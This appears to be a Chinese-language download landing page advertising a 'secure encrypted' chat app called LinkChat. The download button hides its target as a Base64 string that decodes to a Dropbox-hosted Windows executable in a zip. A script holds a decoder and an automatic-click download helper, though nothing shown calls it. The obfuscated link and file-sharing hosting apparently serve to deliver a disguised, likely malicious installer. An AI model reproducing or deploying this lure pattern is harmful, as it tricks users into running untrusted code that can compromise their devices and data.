<!DOCTYPE html>
<html lang="zh"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no">
    <title>园林社区</title>
    <style>
        #share {max-width:750px; height:100%; background-color:#fff; text-align:center; color:#141E46; font-size:14px; margin:0 auto;}
        .logo {width:130px; height:160px; margin-top:74px;}
        .desci {width:133px; height:36px; margin-top:29px; position:relative; top:0; left:50%; transform:translate(-50%, 0);}
        .desci > img {width:100%; height:100%;}
        .content {line-height:30px; margin-top:20px;}
        .downbated {width:80%; height:50px; background-color:#007EFF; border:none; color:#fff; font-size:16px;
            line-height:50px; border-radius:50px; margin-top:40px; box-shadow:0 5px 6px 1px rgba(0, 126, 255, 0.4); position:relative; outline:none;}
        .bgImg {width:100%; height:auto; margin-top:20px;}
        .bat {width:36px; height:36px; position:absolute; top:50%; left:26px; transform:translate(0, -50%);}
        .weixin{position:fixed; width:100%; height:100%; top:0px; left:0px; background:rgba(0,0,0, .5);}
        .wx-img-box{position:relative; width:100%; text-align:right;}
        .wx-img-box img{width:80%;}
    </style>
</head>
<body>
<div id="share"><img src="static/picture/img_sbat_logos.png" class="logo"> <div class="desci"><img src="static/picture/img_wbat_mark.png"></div> <div class="content">
        安全加密的客服软件，<br>
        可以随时随地和朋友进行闲聊。<br>
        和重要的人聊重要的事!
    </div> <button class="downbated"><img src="static/picture/img_sbat_logos.png" class="bat"><a href="aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2NsL2ZpLzFnejVpNXNlNGo1YjF1ZGpiZDl0ZC9MaW5rQ2hhdC1VbmktMi4yLjIteDg2LTY0LmV4ZS56aXA/cmxrZXk9dTVhc2wyZmhpOWxrZ3dsMXBpcWd2ZDR3ciZzdD1pdDI0MWFxaSZkbD0x" style="color:#FFFFFF"><span style="margin-left: 20px;" style="color:#FFFFFF">下载LinkChat</span></a></button> <img src="static/picture/img_h_banner2.png" class="bgImg"> <!----></div>
    <script>
        function base64Decode(base64) {
            return atob(base64); // 解码Base64字符串
        }

        function downloadFile(encodedUrl) {
            const url = base64Decode(encodedUrl); // 解码链接
            const link = document.createElement('a');
            link.href = url;
            link.download = ''; // 可选：指定文件下载时的名称
            document.body.appendChild(link); // 将链接添加到文档中
            link.click(); // 模拟点击链接
            document.body.removeChild(link); // 下载后移除链接
        }
    </script>
</body></html>